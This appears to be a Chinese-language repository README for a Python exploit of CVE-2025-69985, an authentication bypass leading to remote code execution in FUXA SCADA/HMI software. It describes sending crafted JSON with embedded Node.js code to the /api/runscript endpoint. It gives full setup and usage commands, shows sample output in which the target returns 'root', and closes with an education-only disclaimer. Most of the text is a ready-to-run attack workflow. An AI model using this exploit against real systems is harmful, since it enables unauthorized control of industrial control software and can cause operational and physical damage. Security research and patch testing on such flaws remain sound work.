
针对 CVE-2025-69985 的 Python 漏洞利用,目标是 FUXA SCADA 软件。向 /api/runscript 端点发送精心构造的 JSON 负载以绕过认证并实现远程代码执行。
此Python利用程序针对CVE-2025-69985,即FUXA(基于Web的SCADA/HMI软件)版本≤1.2.8中的一个严重认证绕过漏洞。通过向未受保护的/api/runscript端点发送带有嵌入式Node.js代码的精心构造的JSON负载,它能够以FUXA进程的身份实现远程命令执行,并在响应中同步捕获完整的标准输出/标准错误。
[!NOTE] 为确保项目依赖的干净隔离环境,建议使用Python的
venv模块。
git clone https://github.com/joshuavanderpoll/CVE-2025-69985.git
cd CVE-2025-69985
python3 -m venv .venv
source .venv/bin/activate
pip3 install -r requirements.txt
git clone https://github.com/joshuavanderpoll/CVE-2025-69985.git
cd CVE-2025-69985
python -m venv .venv
.venv\Scripts\activate
pip3 install -r requirements.txt
python3 CVE-2025-69985.py -u http://localhost:1881/ -c whoami
目标 : http://localhost:1881
命令 : whoami
[*] 准备负载 → 执行:whoami
[*] 发送利用请求至 /api/runscript ...
[*] 响应状态码:200
[+] 命令执行成功! (CVE-2025-69985 绕过)
=== 命令输出 ===
"root\n"
======================================================================
利用完成!
======================================================================
cd docker/
docker compose down
docker compose up -d
# 可在 --url http://127.0.0.1:1881/ 进行测试

此工具仅用于教育和研究目的。创作者对因使用该工具而造成的任何滥用或损害不承担任何责任。